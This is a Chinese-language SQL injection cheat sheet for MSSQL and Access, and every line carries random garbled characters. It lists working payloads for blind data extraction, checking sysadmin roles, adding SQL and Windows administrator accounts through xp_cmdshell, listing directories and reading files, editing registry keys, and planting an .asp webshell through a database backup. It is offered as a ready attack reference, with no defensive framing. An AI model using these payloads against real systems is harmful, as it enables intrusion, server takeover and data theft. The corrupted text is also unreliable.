1.判断是否有注入;and 1=1 ;and 1=2 I�w[7;B�5v
2.初步判断是否是mssql ;and user>0 ;�6��6�55C
lN�~V1�(1B
3.注入参数是字符'and [查询条件] and ''=' $'%.w|�MJp
7GDr�H/yK
4.搜索时没过滤参数的'and [查询条件] and '%25'=' � jnIf��(a
2H9�;4>�ss
5.判断数据库系统 )WH;G:�$&"
�*�-�`��-P
;and (select count(*) from sysobjects)>0 mssql
[��BZA1,�
<x[CL,Zg7�
;and (select count(*) from msysobjects)>0 access ,)�35Vi;.
?Rd{`5�.D
�V�dO�cKP.
��m�&a 8/5
6.猜数据库 ;and (select Count(*) from [数据库名])>0 r�W�U�L�v
�U�#6<80Ke
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 [I�6&|�Lz>
ns�N�|�[E8
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 {?RVw`g&f�
R5& R�~1�N
9.(1)猜字段的ascii值(access) 6DT��^:LHS
<5E:�� ,�<
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �z)F�<{]�%
R���A��U"
(2)猜字段的ascii值(mssql) �A�+41�JMH
x%�RG>),�U
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 u�W0D�m��#
d}^G79���0
10.测试权限结构(mssql) AM�re(lg�h
L��0����X/
?a�W�MU?�S
TGH"OXV*�@
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- )%�wNVW 0C
2+=�:pc�^�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �$(��fhO��
.K�`Ef�l�N
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- wC���gi@�\
�{'a��|$u+
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- b� Od<x
>@
FH���)_L1n
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- >K �n7�A�
&>A<{J@VL�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- i_�f\dko�l
952l1c�!��
;and 1=(select IS_MEMBER('db_owner'));-- *;�:dJX�R
oM�(8'{�S=
}l7@:ezZZ7
:^�r�t8>~�
11.添加mssql和系统的帐户 �N~|Z@pU"�
�X" U�pml�
;exec master.dbo.sp_addlogin username;-- ��m�li�x^P
;exec master.dbo.sp_password null,username,password;-- iH��KX#��*
$*+�IsP!
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �sc&u NfJ�
X�'��J!.Jj
;exec master.dbo.xp_cmdshell 'net user username password Xv<K>i�>k
({0:1*lF�@
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- *CCh\�+S7m
V�T �[T��E
;exec master.dbo.xp_cmdshell 'net user username password /add';-- -�?p4"�[��
{J�c.4���9
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �:Z&<5����
^v5<*�uf%m
<Uc?#;%�Y}
�fM`.��v�+
12.(1)遍历目录 ���P0�9��f
2�rxz<ck(
;create table dirs(paths varchar(100), id int) �� &4{�!5r
~@$�RX:�p�
;insert dirs exec master.dbo.xp_dirtree 'c:\' Sjp �]TW�j
\b�*z<O�dv
;and (select top 1 paths from dirs)>0 7yQw$zG,Iz
|8�?DQh�d}
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) x|$|~�6f=n
X/ ��lmj_v
�tID=�I0D�
"\+.S�]�~�
(2)遍历目录 C���7Fx�V2
C`=YGyj=TL
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ap�gR�[=Oy
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 >%�H(0G#�X
2��b
K1.BD
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 /B���<QYvv
JbA�mud,��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 SQ��DfDrYP
�rXR!jZ.hi
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 y96HT�Q32
\Oxyc�}�&�
&%`�WXe-`R
X�?�U'�GLm
13.mssql中的存储过程 H[R�X~Xk2E
8n35lI�(
[
xp_regenumvalues 注册表根键, 子键 Y����@U�r}
�e}�+Zj�'5
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 _Fx��eZ4\�
@{"?�f�q�o
xp_regread 根键,子键,键值名 :gn����&wi
���{���H*�
;exec xp_regread jG{OLF�6 !
��>��f�'aW
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 '+\t,>nRkl
x~Dj2�F�]
xp_regwrite 根键,子键, 值名, 值类型, 值 r{�K�Q3j9O
I�G�OEqUw*
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 l5#�SOo�\�
=!�\Y�;r�k
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 p\R&�v�of*
X��e&p.v�
xp_regdeletevalue 根键,子键,值名 �qKr�xln/T
waU2C2�!w�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Y/�sZPG}�4
4]�#$YehM5
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 O-hu�C:zZh
���m}�7�Nu
cn� �Oh�j
�/0o#�V-E)
14.mssql的backup创建webshell � OA�^6�l#
X�Z@�|�(_Z
use model *M/�:W =,t
/;k��Sa}"Q
create table cmd(str image); )<lQJ#L86a
z'7XGO'Lo
insert into cmd(str) values (''); �~1{p�pc+
�E�\ls- (,
backup database model to disk='c:\l.asp'; �/�+1(�,�S
�p|�?FA@ 3
0Py�*%}�r1
w+wtr[;wwL
15.mssql内置函数 d<6m�_!��L
CXi�[$�nF3
;and (select @@version)>0 获得Windows的版本号 �bjo}�95��
9s1^�hW2%Q
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 7Ie=(�x8):
*�%����Fu/
;and (select user_name())>0 爆当前系统的连接用户 5+�Ao.3�Xn
#�qFY`fVf1
;and (select db_name())>0 得到当前连接的数据库 � �O4�Q"2�
`?�O�0�)��
�C57m�{R�H
#;�f50j�!r
16.简洁的webshell 3YJ"[$w='(
,Ha��<lU2K
use model SF`(`�h0e
'4SD�Aa�2f
create table cmd(str image); l))Q�/�8H
i\O�^s� �]
insert into cmd(str) values (''); )�*`h�)`\y
"�:f]egq
-
backup database model to disk='g:\wwwtest\l.asp';
